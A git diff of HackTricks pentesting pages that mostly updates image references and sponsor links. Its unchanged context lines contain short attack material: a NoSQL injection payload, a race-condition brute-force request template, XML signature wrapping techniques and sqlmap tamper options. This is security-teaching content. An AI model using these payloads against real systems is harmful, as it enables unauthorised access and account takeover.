 The victim will receive as response the **HEAD response + the content of the second request response (containing part of the reflected data):**
 
-![](<../.gitbook/assets/image (353).png>)
+![](<../.gitbook/assets/image (356).png>)
 
 However, note how the **reflected data had a size according to the Content-Length** of the **HEAD** response that **generated a valid HTTP response in the response queue**.
 
diff --git a/pentesting-web/ldap-injection.md b/pentesting-web/ldap-injection.md
index b264c0e94..d8bb6c987 100644
--- a/pentesting-web/ldap-injection.md
+++ b/pentesting-web/ldap-injection.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -235,7 +235,7 @@ intitle:"phpLDAPadmin" inurl:cmd.php
 
 {% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}
 
-<figure><img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
diff --git a/pentesting-web/nosql-injection.md b/pentesting-web/nosql-injection.md
index 3e32eed13..66de0634e 100644
--- a/pentesting-web/nosql-injection.md
+++ b/pentesting-web/nosql-injection.md
@@ -1,12 +1,12 @@
 # NoSQL injection
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=nosql-injection) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=nosql-injection" %}
 
 <details>
 
@@ -118,7 +118,7 @@ Using the **$func** operator of the [MongoLite](https://github.com/agentejo/cock
 "user":{"$func": "var_dump"}
 ```
 
-![https://swarm.ptsecurity.com/wp-content/uploads/2021/04/cockpit\_auth\_check\_10.png](<../.gitbook/assets/image (930).png>)
+![https://swarm.ptsecurity.com/wp-content/uploads/2021/04/cockpit\_auth\_check\_10.png](<../.gitbook/assets/image (933).png>)
 
 ### Get info from different collection
 
@@ -145,13 +145,13 @@ It's possible to use [**$lookup**](https://www.mongodb.com/docs/manual/reference
 ]
 ```
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=nosql-injection) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=nosql-injection" %}
 
 ## MongoDB Payloads
 
@@ -295,10 +295,10 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=nosql-injection) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=nosql-injection" %}
diff --git a/pentesting-web/oauth-to-account-takeover.md b/pentesting-web/oauth-to-account-takeover.md
index bd35b55a5..8c605ae3f 100644
--- a/pentesting-web/oauth-to-account-takeover.md
+++ b/pentesting-web/oauth-to-account-takeover.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
@@ -226,7 +226,7 @@ If the platform you are testing is an OAuth provider [**read this to test for po
 * [**https://portswigger.net/research/hidden-oauth-attack-vectors**](https://portswigger.net/research/hidden-oauth-attack-vectors)
 
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/pentesting-web/parameter-pollution.md b/pentesting-web/parameter-pollution.md
index 59e546848..6246168b0 100644
--- a/pentesting-web/parameter-pollution.md
+++ b/pentesting-web/parameter-pollution.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
@@ -70,7 +70,7 @@ The way web technologies handle duplicate HTTP parameters varies, affecting thei
 * [https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654](https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654)
 * [https://github.com/google/google-ctf/tree/master/2023/web-under-construction/solution](https://github.com/google/google-ctf/tree/master/2023/web-under-construction/solution)
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/pentesting-web/phone-number-injections.md b/pentesting-web/phone-number-injections.md
index c6d722ca8..3f1885197 100644
--- a/pentesting-web/phone-number-injections.md
+++ b/pentesting-web/phone-number-injections.md
@@ -16,13 +16,13 @@ Other ways to support HackTricks:
 
 It's possible to **add strings at the end the phone number** that could be used to exploit common injections (XSS, SQLi, SSRF...) or even to bypass protections:
 
-<figure><img src="../.gitbook/assets/image (458).png" alt="https://www.youtube.com/watch?app=desktop\&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (461).png" alt="https://www.youtube.com/watch?app=desktop\&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
 
-<figure><img src="../.gitbook/assets/image (938).png" alt="https://www.youtube.com/watch?app=desktop\&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (941).png" alt="https://www.youtube.com/watch?app=desktop\&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
 
 **OTP Bypass / Bruteforce** would work like this:
 
-<figure><img src="../.gitbook/assets/image (113).png" alt="https://www.youtube.com/watch?app=desktop\&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (116).png" alt="https://www.youtube.com/watch?app=desktop\&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
 
 ## References
 
diff --git a/pentesting-web/postmessage-vulnerabilities/README.md b/pentesting-web/postmessage-vulnerabilities/README.md
index ee99e66af..941197a47 100644
--- a/pentesting-web/postmessage-vulnerabilities/README.md
+++ b/pentesting-web/postmessage-vulnerabilities/README.md
@@ -18,7 +18,7 @@ Other ways to support HackTricks:
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -28,7 +28,7 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
 ## Send **PostMessage**
 
@@ -111,7 +111,7 @@ In order to **find event listeners** in the current page you can:
 
 * **Go to** _Elements --> Event Listeners_ in the developer tools of the browser
 
-![](<../../.gitbook/assets/image (393).png>)
+![](<../../.gitbook/assets/image (396).png>)
 
 * Use a **browser extension** like [**https://github.com/benso-io/posta**](https://github.com/benso-io/posta) or [https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker). This browser extensions will **intercept all the messages** and show them to you.
 
@@ -248,7 +248,7 @@ For **more information**:
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
diff --git a/pentesting-web/proxy-waf-protections-bypass.md b/pentesting-web/proxy-waf-protections-bypass.md
index 259fd6f8e..66e0f3829 100644
--- a/pentesting-web/proxy-waf-protections-bypass.md
+++ b/pentesting-web/proxy-waf-protections-bypass.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
@@ -127,7 +127,7 @@ It was possible to bypass AWS WAF because it wouldn't understand that the next l
 * [https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/)
 
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/pentesting-web/race-condition.md b/pentesting-web/race-condition.md
index df4a5233d..2cce89925 100644
--- a/pentesting-web/race-condition.md
+++ b/pentesting-web/race-condition.md
@@ -1,12 +1,12 @@
 # Race Condition
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=race-condition) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=race-condition" %}
 
 <details>
 
@@ -62,7 +62,7 @@ If connection warming is ineffective, triggering web servers' rate or resource l
 
 * **Tubo Intruder - HTTP2 single-packet attack (1 endpoint)**: You can send the request to **Turbo intruder** (`Extensions` -> `Turbo Intruder` -> `Send to Turbo Intruder`), you can change in the request the value you want to brute force for **`%s`** like in `csrf=Bn9VQB8OyefIs3ShR2fPESR0FzzulI1d&username=carlos&password=%s` and then select the **`examples/race-single-packer-attack.py`** from the drop down:
 
-<figure><img src="../.gitbook/assets/image (54).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (57).png" alt=""><figcaption></figcaption></figure>
 
 If you are going to **send different values**, you could modify the code with this one that uses a wordlist from the clipboard:
 
@@ -115,7 +115,7 @@ Content-Length: 0
   * For **delaying** the process **between** processing **one request and another** in a 2 substates steps, you could **add extra requests between** both requests.
   * For a **multi-endpoint** RC you could start sending the **request** that **goes to the hidden state** and then **50 requests** just after it that **exploits the hidden state**.
 
-<figure><img src="../.gitbook/assets/image (55).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (58).png" alt=""><figcaption></figcaption></figure>
 
 * **Automated python script**: The goal of this script is to change the email of a user while continually verifying it until the verification token of the new email arrives to the last email (this is because in the code it was seeing a RC where it was possible to modify an email but have the verification sent to the old one because the variable indicating the email was already populated with the first one).\
   When the word "objetivo" is found in the received emails we know we received the verification token of the changed email and we end the attack.
@@ -422,10 +422,10 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=race-condition) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=race-condition" %}
diff --git a/pentesting-web/rate-limit-bypass.md b/pentesting-web/rate-limit-bypass.md
index bbdee7739..d534a8ea4 100644
--- a/pentesting-web/rate-limit-bypass.md
+++ b/pentesting-web/rate-limit-bypass.md
@@ -1,12 +1,12 @@
 # Rate Limit Bypass
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=rate-limit-bypass) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=rate-limit-bypass" %}
 
 <details>
 
@@ -84,10 +84,10 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=rate-limit-bypass) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=rate-limit-bypass" %}
diff --git a/pentesting-web/registration-vulnerabilities.md b/pentesting-web/registration-vulnerabilities.md
index e50662755..73b89ccd5 100644
--- a/pentesting-web/registration-vulnerabilities.md
+++ b/pentesting-web/registration-vulnerabilities.md
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
 ## Registration Takeover
 
@@ -205,10 +205,9 @@ JSON Web Token might be used to authenticate an user.
 
 * [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)
 
-
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -218,7 +217,6 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
-
 <details>
 
 <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
@@ -228,7 +226,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/pentesting-web/reset-password.md b/pentesting-web/reset-password.md
index 6f784be5c..9b1a85c7b 100644
--- a/pentesting-web/reset-password.md
+++ b/pentesting-web/reset-password.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
@@ -135,7 +135,7 @@ Stay informed with the newest bug bounties launching and crucial platform update
 
 * [https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token](https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token)
 
-<figure><img src="../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
diff --git a/pentesting-web/saml-attacks/README.md b/pentesting-web/saml-attacks/README.md
index 44d0da961..8f6442835 100644
--- a/pentesting-web/saml-attacks/README.md
+++ b/pentesting-web/saml-attacks/README.md
@@ -56,11 +56,11 @@ First child after round-trip: Z
 
 This is how REXML saw the original XML document from the program above:
 
-![https://mattermost.com/blog/securing-xml-implementations-across-the-web/](<../../.gitbook/assets/image (998).png>)
+![https://mattermost.com/blog/securing-xml-implementations-across-the-web/](<../../.gitbook/assets/image (1001).png>)
 
 And this is how it saw it after a round of parsing and serialization:
 
-![https://mattermost.com/blog/securing-xml-implementations-across-the-web/](<../../.gitbook/assets/image (442).png>)
+![https://mattermost.com/blog/securing-xml-implementations-across-the-web/](<../../.gitbook/assets/image (445).png>)
 
 For more information about the vulnerability and how to abuse it:
 
@@ -78,56 +78,56 @@ The following attacks ara based on [**this blog post**](https://epi052.gitlab.io
 * **Strategy**: A new root element containing the signature is added.
 * **Implication**: The validator may get confused between the legitimate "Response -> Assertion -> Subject" and the attacker's "evil new Response -> Assertion -> Subject", leading to data integrity issues.
 
-![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-1.svg](<../../.gitbook/assets/image (503).png>)
+![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-1.svg](<../../.gitbook/assets/image (506).png>)
 
 ### XSW #2
 
 * **Difference from XSW #1**: Utilizes a detached signature instead of an enveloping signature.
 * **Implication**: The "evil" structure, similar to XSW #1, aims to deceive the business logic post integrity check.
 
-![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-2.svg](<../../.gitbook/assets/image (462).png>)
+![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-2.svg](<../../.gitbook/assets/image (466).png>)
 
 ### XSW #3
 
 * **Strategy**: An evil Assertion is crafted at the same hierarchical level as the original assertion.
 * **Implication**: Intends to confuse the business logic into using the malicious data.
 
-![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-3.svg](<../../.gitbook/assets/image (117).png>)
+![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-3.svg](<../../.gitbook/assets/image (120).png>)
 
 ### XSW #4
 
 * **Difference from XSW #3**: The original Assertion becomes a child of the duplicated (evil) Assertion.
 * **Implication**: Similar to XSW #3 but alters the XML structure more aggressively.
 
-![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-4.svg](<../../.gitbook/assets/image (548).png>)
+![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-4.svg](<../../.gitbook/assets/image (551).png>)
 
 ### XSW #5
 
 * **Unique Aspect**: Neither the Signature nor the original Assertion adhere to standard configurations (enveloped/enveloping/detached).
 * **Implication**: The copied Assertion envelopes the Signature, modifying the expected document structure.
 
-![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-5.svg](<../../.gitbook/assets/image (1027).png>)
+![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-5.svg](<../../.gitbook/assets/image (1030).png>)
 
 ### XSW #6
 
 * **Strategy**: Similar location insertion as XSW #4 and #5, but with a twist.
 * **Implication**: The copied Assertion envelopes the Signature, which then envelopes the original Assertion, creating a nested deceptive structure.
 
-![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-6.svg](<../../.gitbook/assets/image (166).png>)
+![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-6.svg](<../../.gitbook/assets/image (169).png>)
 
 ### XSW #7
 
 * **Strategy**: An Extensions element is inserted with the copied Assertion as a child.
 * **Implication**: This exploits the less restrictive schema of the Extensions element to bypass schema validation countermeasures, especially in libraries like OpenSAML.
 
-![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-7.svg](<../../.gitbook/assets/image (968).png>)
+![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-7.svg](<../../.gitbook/assets/image (971).png>)
 
 ### XSW #8
 
 * **Difference from XSW #7**: Utilizes another less restrictive XML element for a variant of the attack.
 * **Implication**: The original Assertion becomes a child of the less restrictive element, reversing the structure used in XSW #7.
 
-![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-8.svg](<../../.gitbook/assets/image (538).png>)
+![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-8.svg](<../../.gitbook/assets/image (541).png>)
 
 ### Tool
 
@@ -209,7 +209,7 @@ Check also this talk: [https://www.youtube.com/watch?v=WHn-6xHL7mI](https://www.
 
 The **XML Signature Exclusion** observes the behavior of SAML implementations when the Signature element is not present. If this element is missing, **signature validation may not occur**, making it vulnerable. It's possibel to test this by altering the contents that are usually verified by the signature.
 
-![https://epi052.gitlab.io/notes-to-self/img/saml/signature-exclusion.svg](<../../.gitbook/assets/image (454).png>)
+![https://epi052.gitlab.io/notes-to-self/img/saml/signature-exclusion.svg](<../../.gitbook/assets/image (457).png>)
 
 ### Tool <a href="#xml-signature-exclusion-how-to" id="xml-signature-exclusion-how-to"></a>
 
diff --git a/pentesting-web/sql-injection/postgresql-injection/README.md b/pentesting-web/sql-injection/postgresql-injection/README.md
index 3380927a8..1807f3d1c 100644
--- a/pentesting-web/sql-injection/postgresql-injection/README.md
+++ b/pentesting-web/sql-injection/postgresql-injection/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -106,7 +106,7 @@ SELECT $$hacktricks$$;
 SELECT $TAG$hacktricks$TAG$;
 ```
 
-<figure><img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
diff --git a/pentesting-web/sql-injection/sqlmap/README.md b/pentesting-web/sql-injection/sqlmap/README.md
index 3b2acd496..163204362 100644
--- a/pentesting-web/sql-injection/sqlmap/README.md
+++ b/pentesting-web/sql-injection/sqlmap/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
@@ -236,7 +236,7 @@ Remember that **you can create your own tamper in python** and it's very simple.
 | versionedmorekeywords.py     | Encloses each keyword with versioned MySQL comment                                                                                 |
 | xforwardedfor.py             | Append a fake HTTP header 'X-Forwarded-For'                                                                                        |
 
-<figure><img src="../../../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
diff --git a/pentesting-web/ssrf-server-side-request-forgery/README.md b/pentesting-web/ssrf-server-side-request-forgery/README.md
index 93de45239..d923c6dad 100644
--- a/pentesting-web/ssrf-server-side-request-forgery/README.md
+++ b/pentesting-web/ssrf-server-side-request-forgery/README.md
@@ -1,12 +1,12 @@
 # SSRF (Server Side Request Forgery)
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=ssrf-server-side-request-forgery) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
